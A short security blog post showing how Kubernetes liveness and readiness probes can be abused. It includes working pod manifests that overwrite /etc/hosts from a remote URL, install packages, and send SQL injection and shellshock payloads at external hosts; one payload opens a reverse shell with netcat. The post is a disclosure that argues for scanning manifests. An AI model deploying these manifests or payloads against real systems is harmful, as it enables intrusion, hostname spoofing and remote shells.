Exploiting applications using liveness probes in Kubernetes

Philippe Bogaerts
2 min readFeb 7, 2022

Introduction

Startup, readiness, and liveness probes are very well described in the Kubernetes documentation. kubelet uses these probes defined in the pod manifest to verify whether a pod is booting, ready to accept traffic and still alive. It is kubelet who actually executes the probes (and not the pod itself).

There are different ways the probes are executed.

  • httpGet
  • exec

The problems described here are considered ‘as designed’, as you should download containers from a trusted source according to the reviewers.

The examples below shows that trusted sources of container images will not solve the problem, neither will image scanning.

To prevent an attack from happening, it is mandatory to scan the Kubernetes pod and deployment manifests rigorously before deploying (and not use any pre-canned examples :-))

Example 1: Overwriting files on the pod filesystem

This example overwrites the pods /etc/hostfile to spoof hostnames.

kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
labels:
test: liveness
name: liveness-exec15
spec:
containers:
- name: liveness
image: xxradar/hackon
args:
- /bin/sh
- -c
- touch /tmp/healthy;sleep 600
livenessProbe:
exec:
command:
- curl
- www.xxxxx.com/host.txt
- -o
- /etc/hosts
initialDelaySeconds: 5
periodSeconds: 5
EOF

Example 2: Installing applications in a pod at deployment time

kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
labels:
test: liveness
name: liveness-exec39
spec:
containers:
- name: liveness
image: ubuntu
args:
- /bin/sh
- -c
- touch /tmp/healthy;sleep 600
readinessProbe:
exec:
command:
- apt-get
- update
initialDelaySeconds: 5
periodSeconds: 10
timeoutSeconds: 60
livenessProbe:
exec:
command:
- apt-get
- install
- -y
- curl
initialDelaySeconds: 60
periodSeconds: 100
timeoutSeconds: 60
EOF

Example 3: Attacking http(s) endpoints using sql injection, XXS, …

kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
labels:
test: liveness
name: liveness3
spec:
containers:
- name: liveness
image: ubuntu
args:
- /bin/sh
- -c
- touch /tmp/healthy;sleep 600
livenessProbe:
httpGet:
host: www.xxxx.com
path: /?'OR 1=1--
port: 8080
httpHeaders:
- name: User-Agent
value: xxxxxxxxx
EOF

Example 4 : Attacking http(s) endpoints using shellshock

apiVersion: v1
kind: Pod
metadata:
name: radarhack-pod3
labels:
pod: radarhack
spec:
containers:
- name: radarhack
image: docker.io/xxradar/naxsi5
ports:
- containerPort: 80
livenessProbe:
httpGet:
host: www.xxxxx.com
path: /index.html?test=' or 1=1--
port: 8080
httpHeaders:
- name: Custom-Header
value: Awesome
- name: X-Frame-Options
value: () { :;};echo;/bin/nc -e /bin/bash 1.1.x.x 443
initialDelaySeconds: 3
periodSeconds: 3

Conclusion

Many things are written on securely deploying applications on kubernetes. Keep in mind that all aspects need full attention and generating and building Kubernetes manifest is also developping code.

--

--

Philippe Bogaerts

#BruCON co-founder, #OWASP supporter, Application Delivery and Web Application Security, #Kubernetes and #container, #pentesting enthousiast, BBQ & cocktails !!